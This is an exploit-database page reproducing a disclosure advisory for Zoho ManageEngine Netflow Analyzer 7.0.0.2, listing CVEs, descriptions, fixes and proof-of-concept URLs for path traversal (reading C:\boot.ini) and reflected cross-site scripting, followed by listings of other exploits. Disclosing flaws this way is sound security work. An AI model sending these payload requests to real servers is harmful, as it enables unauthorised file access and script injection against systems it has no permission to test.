Menu

Search for hundreds of thousands of exploits

"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting"

Author

Exploit author

"Rafael Pedrero"

Platform

Exploit platform

jsp

Release date

Exploit published date

2019-02-19

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
 
1. Description
   
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
 
   
2. Proof of Concept

Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
 
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini

3. Solution:
   
The product is discontinued. Update to last version this product.

-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Parameters: bussAlert, customDev and selSource


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=

Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest

Parameters: authMeth, passWord, pwd1 and userName


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad

Parameters: param and rtype


3. Solution:
   
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-20"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)"webappsphpindoushka
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"Virtual Freer 1.58 - Remote Command Execution"webappsphpSajjadBnd
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-18"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting"webappsphp"Ultra Security Team"
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting"webappsphp"Ashkan Moghaddas"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"LabVantage 8.3 - Information Disclosure"webappsjava"Joel Aviad Ossi"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
Release DateTitleTypePlatformAuthor
2019-11-12"Atlassian Confluence 6.15.1 - Directory Traversal"webappsjspmax7253
2019-11-12"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)"webappsjspmax7253
2019-07-26"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection"webappsjsp"Wietse Boonstra"
2019-07-26"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution"webappsjsp"Wietse Boonstra"
2019-07-26"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)"webappsjsp"Wietse Boonstra"
2019-06-11"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting"webappsjsp"Valerio Brussani"
2019-06-05"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery"webappsjspk8gege
2019-05-10"dotCMS 5.1.1 - HTML Injection"webappsjsp"Ismail Tasdelen"
2019-03-11"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"webappsjspAkkuS
2019-02-19"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting"webappsjsp"Rafael Pedrero"
2019-02-18"Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload"webappsjsp"Dao Duy Hung"
2018-10-30"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal"webappsjsp"Rafael Pedrero"
2018-04-16"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference"webappsjspFrogy
2018-02-22"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities"webappsjsp"Core Security"
2018-01-15"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect"webappsjsp"Andrew Gill"
2018-01-05"Gespage 7.4.8 - SQL Injection"webappsjspSysdream
2017-10-09"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)"webappsjspintx0x80
2017-10-02"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection"webappsjsp"Marcin Woloszyn"
2017-10-02"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection"webappsjsp"Marcin Woloszyn"
2017-09-13"Infinite Automation Mango Automation - Command Injection (Metasploit)"remotejsp"James Fitts"
2017-08-18"Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution"webappsjsp"Philip Pettersson"
2017-08-09"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal"webappsjspLiquidWorm
2017-08-09"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration"webappsjspLiquidWorm
2017-08-09"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery"webappsjspLiquidWorm
2017-08-09"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery"webappsjspLiquidWorm
2017-08-01"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload"webappsjsp"James Fitts"
2017-08-01"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)"webappsjsp"James Fitts"
2017-07-19"Oracle E-Business Suite 12.x - Server-Side Request Forgery"webappsjsp"Sarath Nair"
2017-05-24"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion"webappsjspf3ci
2017-04-25"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection"webappsjspERPScan
Release DateTitleTypePlatformAuthor
2019-08-28"SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection"webappsphp"Rafael Pedrero"
2019-02-19"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting"webappsjsp"Rafael Pedrero"
2019-02-19"XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting"webappsphp"Rafael Pedrero"
2019-02-04"TaskInfo 8.2.0.280 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-02-04"SpotAuditor 3.6.7 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-02-04"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-02-01"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)"doswindows"Rafael Pedrero"
2019-01-31"LanHelper 1.74 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-01-31"AMAC Address Change 5.4 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-01-31"FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)"doswindows"Rafael Pedrero"
2019-01-31"ASPRunner Professional 6.0.766 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-01-30"IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)"doswindows"Rafael Pedrero"
2019-01-30"Advanced File Manager 3.4.1 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2019-01-30"Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)"doswindows"Rafael Pedrero"
2018-12-21"SQLScan 1.0 - Denial of Service (PoC)"doswindows"Rafael Pedrero"
2018-12-18"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow"remotewindows"Rafael Pedrero"
2018-11-14"Advanced Comment System 1.0 - SQL Injection"webappsphp"Rafael Pedrero"
2018-10-30"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal"webappsjsp"Rafael Pedrero"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46425/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse